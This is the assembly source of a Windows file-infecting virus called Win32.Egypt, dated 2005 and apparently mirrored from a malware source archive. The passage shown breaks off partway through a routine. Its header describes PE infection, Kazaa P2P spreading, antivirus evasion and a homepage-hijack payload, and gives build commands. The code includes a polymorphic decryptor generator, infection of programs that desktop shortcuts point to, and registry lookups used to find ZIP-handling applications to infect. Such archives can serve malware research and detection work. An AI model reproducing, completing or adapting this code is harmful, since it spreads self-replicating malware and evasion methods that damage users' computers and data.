mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
2468 lines
69 KiB
NASM
2468 lines
69 KiB
NASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
; (Ermm...I'd higly appreciate if someone would take the pain
|
||
; of drawing a sphynx or a couple of pyramids here, because,
|
||
; as you can see, not only my asm skills suck...)
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
; Win32.Egypt
|
||
;
|
||
; ~~~~~~~~~~~
|
||
;
|
||
; @2005 TOE-VX
|
||
; ~~~~~~~~~~~~
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;
|
||
;=============================================================================
|
||
; DISCLAIMER :
|
||
; ~~~~~~~~~~ This is the source of a VIRUS, The author is not
|
||
; responsible for any damage that may occur due to
|
||
; the assembly of this file. Use it at your own risk.
|
||
;
|
||
;=============================================================================
|
||
;
|
||
;
|
||
;
|
||
; * Targets : PE EXE Files.
|
||
;
|
||
; * Residence : Per Process Resident.
|
||
;
|
||
; * Hooked APIs : None.
|
||
;
|
||
; * Infection method : Every 8 seconds it will scan for directory change
|
||
; and infects all files in new directory
|
||
; this is a very efficient method to retrieve files.
|
||
; The virus will also search for all exe files pointed
|
||
; to by link files in the desktop and infect them.
|
||
; Also the virus will infect all applications used
|
||
; to open ZIP files. EXE files are infected by the
|
||
; classical method of adding the viral body to the
|
||
; section in the file.
|
||
;
|
||
; * EPO : None.
|
||
;
|
||
; * Polymorphism : Yes, The virus is polymorphic using its own engine.
|
||
; The virus uses slow polymorphism, utilizing a single
|
||
; decryptor for all files infected in the current run
|
||
; of the infected process. The polymorphic engine utilizes
|
||
; random registers, constructs calls to subroutines and
|
||
; also features conditional and unconditional jumps with
|
||
; non zero displacements. Yet it only utilizes a 32 bit
|
||
; xor operation. Although i coded this engine from scratch,
|
||
; i would like to thank GriYo, since i started writing
|
||
; "real" polymorphic engines only after i examined his
|
||
; 1996 Dos virus Implant.
|
||
;
|
||
; * Encryption : Yes, the virus is encrypted twice , the first decryptor
|
||
; is that generated by the polymorphic engine and the other
|
||
; decryptor is a fixed one with anti emulation trick.
|
||
; The encryption algorithm is just meant to be effective
|
||
; against scanners, not a one you would say much about.
|
||
;
|
||
; * Worming : Yes, the virus will infect all executables at the kazza
|
||
; shared folder, thus being able to pass to other PCs and
|
||
; thus exhibiting P2P worming, It will also create an
|
||
; executable file there and infect it, the executable
|
||
; file has a really attractive name ;) and a facked
|
||
; message in case the user runs it.
|
||
;
|
||
; * Misc : Reserves file attributes and time, Marks infected files
|
||
; Uses SEH to stabilize infected files
|
||
; Avoids infecting AVs as it will not infect files
|
||
; having AV,AN,DR,ID,OD,TB,F- in their names
|
||
; Avoids Infecting system files and avoids infecting
|
||
; DLLs misnamed as EXEs also doesn't infect compressed files
|
||
; Those extra checks give the virus very good performance
|
||
; and reduce error and corruption chances.
|
||
;
|
||
; * Payload : 1. On egyptian PCs it will display a funny message
|
||
; the message is randomly chosen from twenty messages
|
||
; the message will appear whenever an infected file
|
||
; is executed with a one over twenty five probability.
|
||
; I have included the english translations in the source
|
||
; in case somebody is interested.
|
||
;
|
||
; 2. On non-egyptian PCs it will change IE default homepage
|
||
; to the egyptain ministry of tourism webpage
|
||
; http://www.Touregypt.net, This will take place on the
|
||
; first and third friday of every month.
|
||
;
|
||
;
|
||
;=============================================================================
|
||
;
|
||
; Version History:
|
||
;=================
|
||
;
|
||
; 25-7-2005 version 1.0 finished
|
||
;
|
||
; 26-7-2005 Kaspersky detects version 1.0 , that's a really good job guys
|
||
; keep it up ;) and as usual they misname the virus as "Gypet" which rather
|
||
; sounds like a porn film title !! *^_^*
|
||
;
|
||
; 27-7-2005 version 1.2 that is a version 1.0 with slight code changes and
|
||
; comments
|
||
;
|
||
; 29-7-2005 I upgraded the virus to version 1.5 by adding a polymorphic
|
||
; engine.
|
||
;
|
||
;=============================================================================
|
||
;
|
||
; Things to be done in ver 2.0:
|
||
;==============================
|
||
;
|
||
; 1- New anti emulation tricks
|
||
; 2- ZIP infection
|
||
; 3- More worming strategies
|
||
; 4- SFC file protection awareness
|
||
; 5- EPO
|
||
; 6- Terminate AVers processes
|
||
;
|
||
;=============================================================================
|
||
;
|
||
; Greetings :
|
||
; ~~~~~~~~~~~
|
||
; Although almost everyone i will be greeting here has already quit writing
|
||
; viruses since a very long time now, i would still like to express my
|
||
; gratitude to them all.
|
||
;
|
||
; Nowhere Man : Everybody knows that VCL produced only lame viruses, yet its
|
||
; commented sources were excellent to teach me assembly in a stupid country
|
||
; lacking any books dedicated to assembly.
|
||
;
|
||
; Dark Angel : For presenting me to "real" Dos viruses.
|
||
;
|
||
; Neurobasher and vyvojar : For writing some of the best Dos viruses ever.
|
||
;
|
||
; 29A : For editing a really good virus magazine.
|
||
;
|
||
; Lord Julus : For being very friendly with me in our few email exchanges
|
||
; and for writing very friendly and useful articles. ( I like Rammstein too ;)
|
||
;
|
||
; The Mental Driller : For being THE most ethical virus writter ever as well
|
||
; as for writing some of the most complicated viruses ever.
|
||
;
|
||
; Zombie : For writing Mistfall.
|
||
;
|
||
; And greetings for all the other virus writers who exhibit ethical and
|
||
; friendly attitude and for those who write advanced and complicated research
|
||
; viruses.
|
||
;
|
||
;=============================================================================
|
||
;
|
||
; * To Assemble :
|
||
; ~~~~~~~~~~~~~~~
|
||
; tasm32 -ml -m5 -q -zn egypt.asm
|
||
; tlink32 -Tpe -c -x -aa egypt,,, import32
|
||
; pewrsec egypt.exe
|
||
;
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
|
||
.386p
|
||
.model flat
|
||
JUMPS
|
||
cmp_ macro reg,joff1
|
||
inc reg
|
||
jz joff1
|
||
dec reg
|
||
endm
|
||
|
||
apicall macro apioff
|
||
call dword ptr [ebp+apioff]
|
||
endm
|
||
|
||
.data
|
||
mark equ 04Ch
|
||
|
||
section_flags equ 00000020h or 20000000h or 80000000h
|
||
code_len equ code_end - code_start
|
||
L equ <LARGE>
|
||
GENERIC_READ equ 80000000h
|
||
GENERIC_WRITE equ 40000000h
|
||
GENERIC_READ_WRITE equ GENERIC_READ or GENERIC_WRITE
|
||
OPEN_EXISTING equ 00000003h
|
||
PAGE_READWRITE equ 00000004h
|
||
PAGE_WRITECOPY equ 00000008h
|
||
FILE_MAP_WRITE equ 00000002h
|
||
FILE_SHARE_READ equ 00000001h
|
||
FILE_ATTRIBUTE_NORMAL equ 00000080h
|
||
FILE_ATTRIBUTE_DIRECTORY equ 00000010h
|
||
FILE_BEGIN equ 00000000h
|
||
HKEY_CURRENT_USER equ 80000001h
|
||
KEY_SET_VALUE equ 00000002h
|
||
REG_SZ equ 00000001h
|
||
SPI_SETDESKWALLPAPER equ 00000020
|
||
CREATE_ALWAYS equ 00000002h
|
||
MB_ICONEXCLAMATION equ 00000030h
|
||
|
||
; Only hardcoded for 1st generation
|
||
|
||
kernel_ equ 0BFF70000h
|
||
kernel_wNT equ 077F00000h
|
||
shit_size equ delta-code_start
|
||
|
||
FILETIME struc
|
||
dwLowDateTime dd ?
|
||
dwHighDateTime dd ?
|
||
FILETIME ends
|
||
|
||
WIN32_FIND_DATA struc
|
||
dwFileAttributes dd ?
|
||
ftCreationTime FILETIME ?
|
||
ftLastAccessTime FILETIME ?
|
||
ftLastWriteTime FILETIME ?
|
||
nFileSizeHigh dd ?
|
||
nFileSizeLow dd ?
|
||
dwReserved0 dd ?
|
||
dwReserved1 dd ?
|
||
cFileName db 260 dup (?)
|
||
cAlternateFileName db 14 dup (?)
|
||
WIN32_FIND_DATA ends
|
||
|
||
SYSTEMTIME struc
|
||
wYear dw ?
|
||
wMonth dw ?
|
||
wDayOfWeek dw ?
|
||
wDay dw ?
|
||
wHour dw ?
|
||
wMinute dw ?
|
||
wSecond dw ?
|
||
wMilliseconds dw ?
|
||
SYSTEMTIME ends
|
||
|
||
; Functions imported by Generation-1 -
|
||
extrn ExitProcess:PROC
|
||
extrn GetModuleHandleA:PROC
|
||
extrn MessageBoxA:PROC
|
||
|
||
; Some dummy data for Generation-1 -
|
||
.data
|
||
dummy dd 0
|
||
|
||
;----------------------------------------------------------------------------
|
||
; CODE -
|
||
;----------------------------------------------------------------------------
|
||
.code
|
||
code_start:
|
||
call poly_dec
|
||
poly_enc:
|
||
popfd
|
||
popad
|
||
pushad
|
||
pushfd
|
||
|
||
call decrypt
|
||
enc:
|
||
|
||
call delta_
|
||
delta: db "Win32.Egypt v 1.5",0
|
||
db "(c) 2005 TOE-VX. Dedicated to my friends RNT and TRT.",0
|
||
db "A Big F#@! you to all the terrorists who commited"
|
||
db " the sharm massacre."
|
||
delta_: pop ebp
|
||
mov eax,ebp
|
||
sub ebp,offset delta
|
||
|
||
sub eax,shit_size
|
||
sub eax,00001000h
|
||
NewEIP equ $-4
|
||
mov dword ptr [ebp+module_base],eax
|
||
|
||
; Constructing SEH will allow the virus to run smoothly and stabilize
|
||
; infected files against crashes.
|
||
|
||
call ChangeSEH
|
||
mov esp,[esp+08h]
|
||
jmp RestoreSEH
|
||
ChangeSEH:
|
||
xor ebx,ebx
|
||
push dword ptr fs:[ebx]
|
||
mov fs:[ebx],esp
|
||
|
||
; Now we will get kernel 32 address
|
||
mov esi,[esp+2Ch]
|
||
and esi,0FFFF0000h
|
||
mov ecx,5
|
||
call GetK32
|
||
|
||
mov dword ptr [ebp+kernel],eax
|
||
|
||
; Now get the APIs
|
||
lea esi,[ebp+@@NamezCRC32]
|
||
lea edi,[ebp+@@Offsetz]
|
||
call GetAPIs
|
||
|
||
; Initialize random number generator
|
||
call irandom32
|
||
|
||
; Generate a polymorphic decryptor
|
||
call Poly
|
||
jc RestoreSEH
|
||
|
||
; Infect all applications used to deal with ZIP files and infect the
|
||
; Kazza shared folder, if any.
|
||
mov eax,[ori_eip+ebp]
|
||
mov [tmp_eip+ebp],eax
|
||
call infectzippers
|
||
mov eax,[tmp_eip+ebp]
|
||
mov [ori_eip+ebp],eax
|
||
|
||
; Infect all the files pointed to by links on the desktop
|
||
mov eax,[ori_eip+ebp]
|
||
mov [tmp_eip+ebp],eax
|
||
call infectlinks
|
||
mov eax,[tmp_eip+ebp]
|
||
mov [ori_eip+ebp],eax
|
||
|
||
|
||
; Launch a thread that will detect directory changes and infect files
|
||
; in new directories
|
||
call LaunchVirusMainThread
|
||
|
||
; Get the Message box API address, if we fail we will skip the payload
|
||
mov eax,offset u32_string
|
||
add eax,ebp
|
||
call VxGetModuleHandle
|
||
or eax,eax
|
||
je RestoreSEH
|
||
mov [user32+ebp],eax
|
||
|
||
mov edx,offset msgbox_string
|
||
add edx,ebp
|
||
mov eax,[user32+ebp]
|
||
call VxGetProcAddress
|
||
or eax,eax
|
||
je RestoreSEH
|
||
mov [_MessageBoxA+ebp],eax
|
||
|
||
; Check if we should make a payload or not and do it if necessary
|
||
call payload ;N.B. payload must be after zip infection
|
||
;as adavapi dll must be loaded
|
||
; Restore SEH and jump back to host
|
||
RestoreSEH:
|
||
xor ebx,ebx
|
||
pop dword ptr fs:[ebx]
|
||
pop eax
|
||
|
||
popfd
|
||
popad
|
||
|
||
mov ebx,12345678h
|
||
org $-4
|
||
ori_eip dd offset g1_quit - 400000h
|
||
|
||
add ebx,12345678h
|
||
org $-4
|
||
module_base dd 00400000h
|
||
|
||
push ebx
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
; P O L Y E N G I N E
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
Poly:
|
||
push 00000040h
|
||
push 00001000h OR 00002000h
|
||
push 00001000h
|
||
push 0h
|
||
call dword ptr [_VirtualAlloc+ebp]
|
||
or eax,eax
|
||
jne contpoly
|
||
stc
|
||
ret
|
||
|
||
decplace dd 0h
|
||
dec_len dd 0h
|
||
viruslen dd 0h
|
||
keyy db 00h, 00h, 00h, 00h
|
||
contpoly:
|
||
mov dword ptr [ebp+decplace],eax
|
||
push eax
|
||
pop edi
|
||
; now edi points to place to put decryptor
|
||
; we want to generate a decryptor that looks like this :
|
||
; pop reg1
|
||
; push reg1
|
||
; xor reg2,reg2
|
||
; mov reg3,key
|
||
;dec_loop:
|
||
; xor dword ptr [reg1],reg3
|
||
; add reg1,4h
|
||
; inc reg2
|
||
; cmp reg2,((decrypt-enc)/4)+1
|
||
; jne dec_loop
|
||
; ret
|
||
|
||
no_reg1_ebp:
|
||
call getfreg ;gen pop reg1
|
||
cmp al,5
|
||
je no_reg1_ebp
|
||
|
||
mov byte ptr [ebp+regs],al
|
||
mov al,byte ptr[pops+eax+ebp]
|
||
stosb
|
||
mov ax,09c60h ;gen pushad&pushfd
|
||
stosw
|
||
|
||
mov dword ptr [ebp+regs+1],0
|
||
|
||
call garble
|
||
|
||
xor eax,eax
|
||
mov al,byte ptr[ebp+regs]
|
||
mov al,byte ptr[pushs+eax+ebp]
|
||
stosb
|
||
call garble
|
||
|
||
xor eax,eax ;gen xor/sub reg2,reg2
|
||
mov al,06h
|
||
call rndeax
|
||
cmp al,3h
|
||
jbe @xor
|
||
mov al,02bh
|
||
jmp @skipxor
|
||
@xor:
|
||
mov al,033h
|
||
@skipxor:
|
||
stosb
|
||
xor eax,eax
|
||
call getfreg
|
||
mov byte ptr [ebp+regs+1],al
|
||
mov bl,al
|
||
push ecx
|
||
mov cl,3
|
||
shl al,cl
|
||
pop ecx
|
||
add al,0c0h
|
||
add al,bl
|
||
stosb
|
||
call garble
|
||
|
||
call getfreg ;gen mov reg3,key
|
||
mov byte ptr [ebp+regs+2],al
|
||
add al,0b8h
|
||
stosb
|
||
call random32
|
||
mov word ptr[ebp+keyy],ax
|
||
stosw
|
||
call random32
|
||
mov word ptr[ebp+keyy+2],ax
|
||
stosw
|
||
call garble
|
||
|
||
mov dword ptr[ebp+loopplace],edi ; we will be loping
|
||
; here
|
||
call garble
|
||
mov al,31h ; gen xor[reg],reg
|
||
stosb
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+regs+2]
|
||
push ecx
|
||
mov cl,3
|
||
shl al,cl
|
||
pop ecx
|
||
mov ebx,eax
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+regs]
|
||
add eax,ebx
|
||
stosb
|
||
call garble
|
||
|
||
mov al,083h ;gen add reg1,4
|
||
stosb
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+regs]
|
||
add ax,04c0h
|
||
stosw
|
||
call garble
|
||
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+regs+1]
|
||
add al,40h
|
||
stosb
|
||
call garble
|
||
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+regs+1]
|
||
cmp al,0
|
||
jne @nf_eax
|
||
mov al,3dh
|
||
stosb
|
||
jmp @conttt
|
||
|
||
@nf_eax:
|
||
xchg al,ah
|
||
mov al,81h
|
||
stosb
|
||
xchg al,ah
|
||
add al, 0f8h
|
||
stosb
|
||
@conttt:
|
||
|
||
mov eax,((poly_end-poly_enc)/4)+1
|
||
stosw
|
||
xor eax,eax
|
||
stosw
|
||
mov ax,0574h
|
||
stosw
|
||
mov al,0e9h
|
||
stosb
|
||
mov eax,dword ptr[ebp+loopplace]
|
||
sub eax,edi
|
||
sub eax,4h ; ??
|
||
mov dword ptr[edi],eax
|
||
inc edi
|
||
inc edi
|
||
inc edi
|
||
inc edi
|
||
|
||
|
||
call garble
|
||
mov al,0c3h ;return
|
||
stosb
|
||
call garble
|
||
|
||
mov ecx,edi
|
||
sub ecx, dword ptr [ebp+decplace]
|
||
mov dword ptr [ebp+dec_len],ecx
|
||
mov dword ptr [ebp+viruslen],code_len
|
||
add dword ptr [ebp+viruslen],ecx
|
||
clc
|
||
ret
|
||
|
||
|
||
pushs:
|
||
push eax
|
||
push ecx
|
||
push edx
|
||
push ebx
|
||
push esp ;won't be used , naturally
|
||
push ebp
|
||
push esi
|
||
push edi
|
||
end_pushs:
|
||
|
||
pops:
|
||
pop eax
|
||
pop ecx
|
||
pop edx
|
||
pop ebx
|
||
pop esp
|
||
pop ebp
|
||
pop esi
|
||
pop edi
|
||
end_pops:
|
||
|
||
garble:
|
||
mov eax,((offset choices_end-choices)/4)
|
||
call rndeax
|
||
shl eax,2
|
||
add eax,ebp
|
||
add eax,offset choices
|
||
mov eax,[eax]
|
||
add eax,ebp
|
||
call eax
|
||
ret
|
||
|
||
choices:
|
||
dd offset garblock
|
||
dd offset pushpop
|
||
dd offset abs_jmp
|
||
dd offset backcall
|
||
dd offset cond_jmp
|
||
dd offset cond_shit
|
||
choices_end:
|
||
|
||
jmplocation dd 0h
|
||
calllocation dd 0h
|
||
|
||
cond_jmp:
|
||
xor eax,eax
|
||
mov al,10h
|
||
call rndeax
|
||
add al,070h
|
||
stosb
|
||
stosb
|
||
mov dword ptr [ebp+jmplocation],edi
|
||
call garblock
|
||
|
||
mov eax,dword ptr [ebp+jmplocation]
|
||
sub eax,edi
|
||
|
||
push edi
|
||
mov edi,dword ptr [ebp+jmplocation]
|
||
dec edi
|
||
neg al
|
||
stosb
|
||
pop edi
|
||
|
||
ret
|
||
|
||
|
||
backcall:
|
||
mov al,0ebh
|
||
stosb
|
||
stosb
|
||
mov dword ptr [ebp+jmplocation],edi
|
||
call abs_shit
|
||
mov dword ptr [ebp+calllocation],edi
|
||
call garblock
|
||
mov al,0c3h
|
||
stosb
|
||
call abs_shit
|
||
|
||
mov eax,dword ptr [ebp+jmplocation]
|
||
sub eax,edi
|
||
|
||
push edi
|
||
mov edi,dword ptr [ebp+jmplocation]
|
||
dec edi
|
||
neg al
|
||
stosb
|
||
pop edi
|
||
|
||
mov al,0e8h
|
||
stosb
|
||
mov eax,(0ffffh -3h)
|
||
sub eax,edi
|
||
add eax,dword ptr [ebp+calllocation]
|
||
stosw
|
||
mov ax,0ffffh
|
||
stosw
|
||
|
||
ret
|
||
|
||
|
||
cond_shit:
|
||
xor eax,eax
|
||
mov al,80h
|
||
call rndeax
|
||
cmp al,40h
|
||
je stc_
|
||
mov ax,073f8h
|
||
stosw
|
||
call abs_shit
|
||
ret
|
||
stc_:
|
||
mov ax,072f9h
|
||
stosw
|
||
call abs_shit
|
||
ret
|
||
|
||
|
||
abs_jmp:
|
||
mov al,0ebh
|
||
stosb
|
||
call abs_shit
|
||
ret
|
||
|
||
abs_shit:
|
||
mov eax,20h
|
||
call rndeax
|
||
stosb
|
||
mov ecx,eax
|
||
shitloop:
|
||
push ecx
|
||
call random32
|
||
pop ecx
|
||
stosb
|
||
loop shitloop
|
||
ret
|
||
|
||
pushpop:
|
||
call getreg
|
||
add eax,ebp
|
||
add eax,offset pushs
|
||
mov al,byte ptr [eax]
|
||
stosb
|
||
call garblock
|
||
call getfreg
|
||
add eax,ebp
|
||
add eax,offset pops
|
||
mov al,byte ptr [eax]
|
||
stosb
|
||
ret
|
||
|
||
garblock:
|
||
xor eax,eax
|
||
mov al,7h
|
||
call rndeax
|
||
add al,3
|
||
mov ecx,eax
|
||
loph:
|
||
push ecx
|
||
call garbage
|
||
pop ecx
|
||
loop loph
|
||
ret
|
||
|
||
garbage:
|
||
xor eax,eax
|
||
mov al,100
|
||
call rndeax
|
||
cmp al,30 ;30% reg imm
|
||
jbe regimm
|
||
cmp al,40 ;10% rem mem
|
||
jbe regmem
|
||
cmp al,50 ;10% one byte
|
||
jbe onebyte
|
||
jmp regreg ;50% reg reg
|
||
|
||
onebyte:
|
||
mov eax,offset one_end-one
|
||
call rndeax
|
||
mov ebx,eax
|
||
add ebx,ebp
|
||
add ebx,offset one
|
||
mov al,byte ptr [ebx]
|
||
stosb
|
||
ret
|
||
|
||
regmem:
|
||
mov eax,offset (etwobitinstrs- twobitinstrs)
|
||
call rndeax
|
||
mov ecx,offset twobitinstrs
|
||
add ecx,eax
|
||
mov al,byte ptr [ecx+ebp]
|
||
or al,al
|
||
je regmem
|
||
stosb
|
||
|
||
call getfreg
|
||
mov ecx,3
|
||
shl al,cl
|
||
|
||
mov ebx,eax
|
||
mov al,08h
|
||
mov al,byte ptr [ebp+regs]
|
||
add eax,ebx
|
||
stosb
|
||
ret
|
||
|
||
regimm:
|
||
;generate op reg,imm (eax not included)
|
||
mov al,81h
|
||
stosb
|
||
mov al,8
|
||
call rndeax
|
||
push ecx ;we now need to make *8
|
||
xor ecx,ecx
|
||
mov cl,3
|
||
shl al,cl
|
||
pop ecx
|
||
add al,0c1h
|
||
mov ebx,eax
|
||
call getfreg
|
||
dec eax ;coz eax has no opcode
|
||
add eax,ebx
|
||
|
||
stosb
|
||
call random32
|
||
stosw
|
||
call random32
|
||
stosw
|
||
ret
|
||
|
||
|
||
regreg:
|
||
;generate op reg,reg
|
||
mov eax, offset (etwobitinstrs- twobitinstrs)
|
||
call rndeax
|
||
xor ebx,ebx
|
||
mov bl,al
|
||
add ebx,offset twobitinstrs
|
||
add ebx,ebp
|
||
mov al,byte ptr [ebx]
|
||
or al,al
|
||
je regreg
|
||
stosb
|
||
call getfreg
|
||
push ecx
|
||
mov cl,3
|
||
shl al,cl
|
||
pop ecx
|
||
mov ebx,eax
|
||
add bl,0c0h
|
||
call getfreg
|
||
add bl,al
|
||
xchg eax,ebx
|
||
stosb
|
||
ret
|
||
|
||
getfreg: ;get free reg
|
||
xor eax,eax
|
||
f_esp:
|
||
mov al,8
|
||
call rndeax
|
||
cmp al,4
|
||
je f_esp
|
||
cmp byte ptr[ebp+regs],al
|
||
je f_esp
|
||
cmp byte ptr[ebp+regs+1],al
|
||
je f_esp
|
||
cmp byte ptr[ebp+regs+2],al
|
||
je f_esp
|
||
ret
|
||
getreg:
|
||
xor eax,eax
|
||
mov al,8
|
||
call rndeax
|
||
ret
|
||
|
||
loopplace dd 0h
|
||
fromhere dd 0h
|
||
regs:
|
||
db 0
|
||
db 0
|
||
db 0
|
||
|
||
twobitinstrs:
|
||
db 23h ;and
|
||
db 3bh ;cmp
|
||
db 0bh ;or
|
||
db 8bh ;mov
|
||
db 33h ;xor
|
||
db 03h ;add
|
||
db 2bh ;sub
|
||
etwobitinstrs:
|
||
|
||
one:
|
||
NOP
|
||
CLC
|
||
STC
|
||
one_end:
|
||
|
||
; POLY ENGINE ENDS HERE
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Infect all files pointed to by links on the desktop
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
infectlinks:
|
||
mov edi,ebp
|
||
add edi,offset olddir
|
||
mov al,0
|
||
mov ecx,128
|
||
rep stosb
|
||
push ebp
|
||
push L 128
|
||
mov eax,ebp
|
||
add eax,offset olddir
|
||
push eax
|
||
call [_GetWindowsDirectoryA+ebp]
|
||
pop ebp
|
||
|
||
mov edi,ebp
|
||
add edi,offset olddir
|
||
add edi,eax
|
||
mov esi,ebp
|
||
add esi,offset desktop
|
||
mov ecx,9
|
||
rep movsb
|
||
|
||
push ebp
|
||
mov eax,ebp
|
||
add eax,offset currdir
|
||
push eax
|
||
push L 128
|
||
call [_GetCurrentDirectoryA+ebp]
|
||
pop ebp
|
||
|
||
mov edx,ebp
|
||
add edx,offset olddir
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
|
||
call searchlinks
|
||
|
||
mov edx,ebp
|
||
add edx,offset currdir
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
ret
|
||
|
||
searchlinks:
|
||
push ebp
|
||
mov eax,offset wfd
|
||
add eax,ebp
|
||
push eax
|
||
mov eax,offset lnk_match
|
||
add eax,ebp
|
||
push eax
|
||
call [_FindFirstFileA+ebp]
|
||
pop ebp
|
||
|
||
inc eax
|
||
or eax,eax
|
||
je icd_end2
|
||
dec eax
|
||
mov [search_handle2+ebp],eax
|
||
|
||
mov edx,offset wfd.cFileName
|
||
add edx,ebp
|
||
call infectlink
|
||
fnf_loop2:
|
||
mov edx,ebp
|
||
add edx,offset olddir
|
||
push edx
|
||
call [ebp+_SetCurrentDirectoryA]
|
||
|
||
push ebp
|
||
mov eax,offset wfd
|
||
add eax,ebp
|
||
push eax
|
||
push [search_handle2+ebp]
|
||
call [_FindNextFileA+ebp]
|
||
pop ebp
|
||
cmp eax,0
|
||
je icd_end2
|
||
mov edx,offset wfd.cFileName
|
||
add edx,ebp
|
||
call infectlink
|
||
jmp fnf_loop2
|
||
icd_end2:
|
||
push [search_handle2+ebp]
|
||
call [ebp+_FindClose]
|
||
ret
|
||
|
||
infectlink:
|
||
|
||
push 0
|
||
push 0
|
||
push OPEN_EXISTING
|
||
push 0
|
||
push 0
|
||
push GENERIC_READ+GENERIC_WRITE
|
||
push edx
|
||
call [ebp+_CreateFileA]
|
||
mov [ebp+hfile2], eax
|
||
|
||
push 0
|
||
push eax
|
||
call [ebp+_GetFileSize]
|
||
push eax
|
||
|
||
push 0
|
||
push eax
|
||
push 0
|
||
push PAGE_READWRITE
|
||
push 0
|
||
push [ebp+hfile2]
|
||
call [ebp+_CreateFileMappingA]
|
||
|
||
mov [ebp+hmap2], eax
|
||
|
||
pop eax
|
||
push eax
|
||
push eax
|
||
|
||
push 0
|
||
push 0
|
||
push 2 ;FILE_MAP_ALL_ACCESS
|
||
push [ebp+hmap2]
|
||
call [ebp+_MapViewOfFile]
|
||
|
||
mov [ebp+haddress2], eax
|
||
pop ebx ; length
|
||
push eax
|
||
pop edx
|
||
add ebx,edx
|
||
scashit:
|
||
inc edx
|
||
cmp edx,ebx
|
||
jae invalidlnk
|
||
|
||
cmp word ptr [edx], "\:"
|
||
jne scashit
|
||
scashit2:
|
||
inc edx
|
||
cmp edx,ebx
|
||
jae invalidlnk
|
||
|
||
cmp word ptr [edx], "\:"
|
||
jne scashit2
|
||
dec edx
|
||
|
||
call InfectFile
|
||
invalidlnk:
|
||
push [ebp+haddress2]
|
||
call [ebp+_UnmapViewOfFile]
|
||
|
||
push [ebp+hmap2]
|
||
call [ebp+_CloseHandle]
|
||
|
||
push [ebp+hfile2]
|
||
call [ebp+_CloseHandle]
|
||
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
; Infect all Applications that are used to open ZIPs
|
||
; and drop the file on kazaa's shared folder, if any
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
infectzippers:
|
||
|
||
pushad
|
||
mov eax,offset a32_string
|
||
add eax,ebp
|
||
call VxGetModuleHandle
|
||
or eax,eax
|
||
je @@@End
|
||
mov [advapi32+ebp],eax
|
||
|
||
mov edx,offset regopen_string
|
||
add edx,ebp
|
||
mov eax,[advapi32+ebp]
|
||
call VxGetProcAddress
|
||
or eax,eax
|
||
je @@@End
|
||
mov [_RegOpenKeyExA+ebp],eax
|
||
|
||
mov edx,offset regget_string
|
||
add edx,ebp
|
||
mov eax,[advapi32+ebp]
|
||
call VxGetProcAddress
|
||
or eax,eax
|
||
je @@@End
|
||
mov [_RegQueryValueExA+ebp],eax
|
||
|
||
mov edx,offset Regset
|
||
add edx,ebp
|
||
mov eax,[advapi32+ebp]
|
||
call VxGetProcAddress
|
||
or eax,eax
|
||
je @@@End
|
||
mov [_RegSetValueExA+ebp],eax
|
||
|
||
mov edx,offset close_string
|
||
add edx,ebp
|
||
mov eax,[advapi32+ebp]
|
||
call VxGetProcAddress
|
||
or eax,eax
|
||
je @@@End
|
||
mov [_RegCloseKey+ebp],eax
|
||
|
||
|
||
player_loop:
|
||
mov eax,offset HandleOpenedKey
|
||
add eax,ebp
|
||
push eax
|
||
push 000F003Fh ;KEY_ALL_ACCESS
|
||
push 0
|
||
call pushstring
|
||
db "Software\Microsoft\Windows\CurrentVersion\Explorer\"
|
||
db "FileExts\.zip\OpenWithList",0
|
||
pushstring:
|
||
push 80000001h ;HKEY_CURRENT_USER
|
||
call [ebp+ _RegOpenKeyExA]
|
||
or eax, eax
|
||
jnz @@End
|
||
|
||
call clean_buff
|
||
mov eax,offset buff_
|
||
add eax,ebp
|
||
push eax
|
||
mov eax, offset buff
|
||
add eax,ebp
|
||
push eax
|
||
push 0
|
||
push 0
|
||
call pushvalue
|
||
player db "a",0
|
||
pushvalue:
|
||
push dword ptr [ebp+HandleOpenedKey]
|
||
call [ebp+_RegQueryValueExA]
|
||
|
||
push dword ptr [ebp+ HandleOpenedKey]
|
||
call [ebp+_RegCloseKey] ; Close key handle
|
||
|
||
mov esi,offset buff
|
||
mov edi,offset prog_buffer
|
||
add esi,ebp
|
||
add edi,ebp
|
||
next_copy:
|
||
lodsb
|
||
cmp al,0
|
||
je copy_done
|
||
stosb
|
||
jmp next_copy
|
||
copy_done:
|
||
mov esi,offset part2
|
||
add esi,ebp
|
||
mov ecx,part2_len
|
||
rep movsb
|
||
|
||
mov eax, offset HandleOpenedKey
|
||
add eax,ebp
|
||
push eax
|
||
push 000F003Fh ;KEY_ALL_ACCESS
|
||
push 0
|
||
mov eax, offset prog_itself
|
||
add eax,ebp
|
||
push eax
|
||
push 80000000h ;HKEY_CLASSES_ROOT
|
||
call [ebp+_RegOpenKeyExA]
|
||
|
||
or eax, eax
|
||
jnz @@End
|
||
|
||
